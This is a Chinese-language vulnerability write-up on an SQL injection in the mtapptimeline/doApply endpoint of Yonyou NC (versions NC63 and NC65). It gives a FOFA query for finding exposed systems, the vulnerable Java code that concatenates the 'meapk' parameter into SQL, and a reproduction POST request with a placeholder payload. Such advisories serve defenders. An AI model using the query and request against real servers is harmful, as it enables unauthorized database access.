用友NC mtapptimeline/doApply SQL注入漏洞


漏洞简介

用友NC系统的 mtapptimeline/doApply 接口存在SQL注入漏洞。攻击者可通过构造恶意的 SQL 语句注入请求参数,绕过身份验证或获取数据库敏感信息,进而可能导致任意数据读取、篡改甚至系统权限提升,影响系统的安全性和数据完整性。

影响版本

NC63、NC65

fofa语法

app="用友-UFIDA-NC"

漏洞分析

直接看MtAppTimeLineAction 类的doApply方法的实现逻辑吧

@Action
public void doApply() {
    HttpServletRequest request = this.request;
    String maEventPk = request.getParameter("meapk");
    IMeetingApplyQueryService qs = (IMeetingApplyQueryService)NCLocator.getInstance().lookup(IMeetingApplyQueryService.class);
    String whereSQL = "pk_mtappdoc='" + maEventPk + "'";

    try {
        MeetingApplyEventVO[] maEvents = qs.queryMeetingApplyEvents(whereSQL, (SQLParameter)null);
        String pk_currentuser = LfwRuntimeEnvironment.getLfwSessionBean().getPk_user();
        StringBuilder sd = new StringBuilder();
        sd.append(this.bulidupXml(maEvents, pk_currentuser));
        ResponseUtils.outputClientStreamWithGzip(this.getResponse(), "text/xml", sd.toString());
    } catch (BusinessException e) {
        Logger.error(e.getMessage(), e);
        throw new LfwRuntimeException(e.getMessage());
    }
}

参数meapk这里被拼接进SQL语句中,整个过程没有对参数meapk进行校验或过滤,从而造成了SQL注入漏洞,朴实无华的!

漏洞复现

需注意NC65 大多数为Oracle 少数MSSQL

POST /portal/pt/mtapptimeline/doApply HTTP/1.1
Host: nc.mrxn.net
Content-Type: application/x-www-form-urlencoded

pageId=login&meapk=SQLI_POC

通过报错注入成功在响应回显当前数据库用户!


手机扫码阅读

索贝融媒体 /sobey-mchEditor/mch/WXArticleInt/restore SQL注入漏洞

索贝融媒体 /sobey-mchEditor/count/getCountByCode SQL注入漏洞

评 论